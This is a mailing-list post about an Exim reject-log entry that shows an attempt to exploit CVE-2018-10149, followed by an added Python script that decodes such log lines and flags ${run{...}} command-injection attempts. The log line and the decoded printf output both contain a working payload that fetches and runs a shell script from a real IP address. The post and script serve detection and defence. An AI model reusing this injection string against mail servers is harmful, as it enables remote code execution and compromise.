Russian Anal Probing + Malware
Andy Smith
andy at strugglers.net
Sun Jun 23 04:04:13 UTC 2019
Hello,
On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?
Some user there is trying to exploit CVE-2018-10149:
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"
Plus another 17 attempts by that IP through to 19 June.
$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"
(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)
Cheers,
Andy
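For anyone wanting to sweep their own Exim logs for the same thing, here is a small parser, added here as an example and not code from Andy's post: it undoes Exim's \xHH log escaping, flags any RCPT TO address that contains a ${run{...}} expansion, pulls out the timestamp, source IP and the download URL (defanged to hxxp the same way as above), and counts attempts per client. The embedded sample log is constructed: the first line is the one quoted in the mail, the second is a made-up repeat from the same client, and the third is a made-up harmless sync error (198.51.100.7 and example.com are documentation addresses).

```python
"""Pick ${run{...}} command-execution attempts out of Exim reject-log lines.

Added example; this is not code from the original post. The first sample
line is the one quoted in the mail; the other two are constructed, with
198.51.100.7 / example.com standing in for a harmless client, so the whole
thing runs offline against embedded input.
"""
import re
from typing import Dict, List, Optional

# Exim writes spaces, quotes and other awkward bytes in log lines as \xHH,
# which is why the payload in the mail looks like "\x2fbin\x2fsh".
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
RCPT_TO = re.compile(r'rejected "RCPT TO:<([^>]*)>"')
SOURCE_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
TIMESTAMP = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")
URL = re.compile(r"""https?://[^\s"'&;|]+""")
# Exim's ${run{command}} string expansion. Matched on the decoded address
# so the check cannot be dodged by the escaping.
RUN_EXPANSION = re.compile(r"\$\{run\{", re.IGNORECASE)

SAMPLE_LOG: List[str] = [
    # Line quoted in the post.
    r'2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"',
    # Constructed: a later repeat from the same client with the same payload.
    r'2019-06-19 08:12:44 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"',
    # Constructed: an ordinary pipelining sync error with a plain recipient.
    r'2019-06-12 09:15:02 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<user@example.com>" H=(mail.example.com) [198.51.100.7] next input="DATA\n"',
]


def decode_exim_escapes(text: str) -> str:
    """Turn Exim's \\xHH log escaping back into the literal characters."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def defang(url: str) -> str:
    """Rewrite http(s):// as hxxp(s):// so the URL is not auto-followed."""
    return re.sub(r"^http", "hxxp", url, count=1)


def analyse_line(line: str) -> Optional[Dict[str, object]]:
    """Describe a ${run{...}} attempt found in one Exim log line, else None."""
    m = RCPT_TO.search(line)
    if not m:
        return None
    rcpt = decode_exim_escapes(m.group(1))
    run = RUN_EXPANSION.search(rcpt)
    if not run:
        return None
    ts = TIMESTAMP.match(line)
    ip = SOURCE_IP.search(line)
    # The command is whatever sits between ${run{ and the closing }}; this
    # deliberately does not try to parse Exim's full expansion syntax.
    cmd = rcpt[run.end():].rsplit("}}", 1)[0]
    return {
        "timestamp": ts.group(1) if ts else None,
        "source_ip": ip.group(1) if ip else None,
        "recipient": rcpt,
        "command": cmd,
        "urls": [defang(u) for u in URL.findall(cmd)],
    }


def attempts_by_ip(lines: List[str]) -> Dict[str, int]:
    """Count ${run{...}} attempts per source IP across a batch of log lines."""
    counts: Dict[str, int] = {}
    for line in lines:
        hit = analyse_line(line)
        if hit and hit["source_ip"]:
            counts[hit["source_ip"]] = counts.get(hit["source_ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hit = analyse_line(entry)
        if hit:
            print(hit["timestamp"], hit["source_ip"], hit["urls"])
            print("  ", hit["command"])
    print(attempts_by_ip(SAMPLE_LOG))
```

Feed it the real log with something like `analyse_line` over `open('/var/log/exim4/mainlog')`; the decode step matters because a naive grep for `${run{` on the raw line works for this particular payload but not for anything Exim has escaped further.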